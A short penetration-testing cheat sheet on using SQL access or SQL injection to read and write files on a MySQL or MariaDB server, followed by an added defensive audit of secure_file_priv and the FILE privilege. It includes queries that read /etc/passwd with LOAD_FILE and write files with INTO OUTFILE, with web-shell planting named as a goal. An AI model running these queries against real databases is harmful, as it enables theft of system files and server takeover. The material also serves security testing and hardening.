Database Exploitation: File system
If we are able to run SQL queries, either through direct access or through a SQL injection, we may be able to read or write files on the database server.
Common usages are:
- Read sensitive files (configuration files, /etc/passwd, etc.)
- Write a web shell (this requires the webserver root path; check whether error messages reveal it, or try well-known paths)
In the context of a SQLi, you can use sqlmap to automate this.
To read a file:
SELECT LOAD_FILE('/etc/passwd');
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE xxx;
To write something to a file (beware of query length limits):
SELECT [...] INTO OUTFILE '/path/to/writable/dir/myfile';
SELECT "Hello!" INTO OUTFILE '/tmp/myfile';
SELECT FROM_BASE64("SGVsbG8h") INTO OUTFILE '/tmp/myfile';
DBMS Introspection
MySQL secure_file_priv
MySQL uses the secure_file_priv system variable. If it is empty, there is no restriction. If it is NULL, read/write are disabled. Otherwise, reads and writes are limited to the specified folder. We can check the current value with:
SELECT variable_value FROM information_schema.global_variables
WHERE VARIABLE_NAME='secure_file_priv';
MariaDB has this variable set to empty by default. MySQL uses /var/lib/mysql-files as the default folder.
List Users That Can Manipulate Files
List users with the FILE privilege (Y = yes):
SELECT grantee, privilege_type
FROM information_schema.user_privileges
WHERE PRIVILEGE_TYPE = 'FILE';
SELECT user, File_priv FROM mysql.user;
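The two introspection checks above combined into a single audit from the defender's side, as an added example that is not part of the original cheat sheet; the account name in the REVOKE is a placeholder.

```sql
-- Added audit example (not from the original page).
-- 1. Classify the effective secure_file_priv setting in one row.
--    NULL  -> LOAD_FILE / INTO OUTFILE are disabled entirely
--    ''    -> no restriction: any path the mysqld OS user can reach
--    other -> reads and writes confined to that directory
SELECT
  @@global.secure_file_priv AS secure_file_priv,
  CASE
    WHEN @@global.secure_file_priv IS NULL THEN 'file read/write disabled'
    WHEN @@global.secure_file_priv = ''    THEN 'UNRESTRICTED: review immediately'
    ELSE CONCAT('restricted to ', @@global.secure_file_priv)
  END AS assessment;

-- 2. Accounts holding the global FILE privilege. On a hardened server this
--    list should contain only dedicated administrative or ETL accounts,
--    never the credentials an application uses at runtime.
SELECT grantee
FROM information_schema.user_privileges
WHERE privilege_type = 'FILE'
ORDER BY grantee;

-- 3. Remediation for an application account that should not have it.
--    'app'@'%' is a placeholder name, not taken from the page.
REVOKE FILE ON *.* FROM 'app'@'%';

-- secure_file_priv itself is read-only at runtime: it cannot be changed with
-- SET GLOBAL and must be set in the server configuration, e.g. in my.cnf:
--   [mysqld]
--   secure_file_priv = /var/lib/mysql-files
-- followed by a restart of mysqld.
```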